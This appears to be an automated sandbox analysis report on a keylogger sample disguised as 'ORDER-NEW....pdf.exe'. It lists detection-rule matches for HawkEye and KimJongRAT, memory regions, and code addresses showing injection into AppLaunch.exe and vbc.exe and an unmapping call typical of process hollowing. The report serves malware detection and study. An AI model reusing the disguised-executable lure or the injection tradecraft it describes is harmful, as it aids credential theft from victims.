              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.2.AppLaunch.exe.94d834a.4.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 18.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 18.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.3.AppLaunch.exe.8705890.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.3.AppLaunch.exe.875dbda.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 18.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.3.AppLaunch.exe.8705bd5.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.3.AppLaunch.exe.8705890.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 00000012.00000000.843177172.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000005.00000000.690486770.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000012.00000000.842827239.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000012.00000000.842483097.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000005.00000000.690115034.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000000.00000000.702281950.00000000047C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000012.00000000.843631196.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000005.00000000.691070548.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000000.00000000.712572110.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000000.00000002.738563781.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000000.00000000.711229338.00000000047C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: Process Memory Space: ORDER-NEW....pdf.exe PID: 6860, type: MEMORYSTR | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTR | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156
Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe | Code function: 0_2_008A4762
Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe | Code function: 0_2_012104E9
Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe | Code function: 0_2_01210E70
Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe | Code function: 0_2_012118A0
Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe | Code function: 0_2_012173A2
Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe | Code function: 0_2_012173B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_054304D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_054354B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05432068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05430C48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05436C29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05439F98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05439938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_054338E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05438540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05430562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433564
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05434519
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05434528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05438531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_0543053B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_054305ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_054305A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_0543E45F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_0543174D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_054317D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05434168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05434178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_0543E1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_0543E30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05431D6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433DDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433C73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433C1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05430C35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05431C83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05431CBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433E75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05436E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433E1A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05431E95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05439928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_054339D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_054329E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_054319F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_054329F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433981
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_054348D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_054348E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_054318FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_0543588B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05435890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433B1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433BCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433BF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05431BB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433A77
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433A02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433ADD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_05433AAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09C3B990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09C34C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09C30040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09C34310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09C362B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09C38B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09C38B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09C33FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09C39080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09C39090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09C3001C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09C34304
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09C3C2C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09C3C2C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09E315DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09E314DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09E31415
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09E30778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09E30EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09E31295
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09E31174
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09E31134
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09E3170B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09E312D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09E31667
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09E3125A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_0044900F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_004042EB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00414281
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00410291
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_004063BB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00415624
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_0041668D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_0040477F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_0040487C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_0043589B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_0043BA9D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_0043FBD3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00404DE5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00404E56
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00404EC7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00404F58
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_0040BF6B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00415F19 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 0044468C appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 004162C2 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00412084 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00444B90 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 0041607A appears 66 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 004083D6 appears 32 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 5_2_09E31398 NtUnmapViewOfSection
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
Source: ORDER-NEW....pdf.exe | Binary or memory string: OriginalFilename vs ORDER-NEW....pdf.exe
Source: ORDER-NEW....pdf.exe, 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameReborn Stub.exe" vs ORDER-NEW....pdf.exe
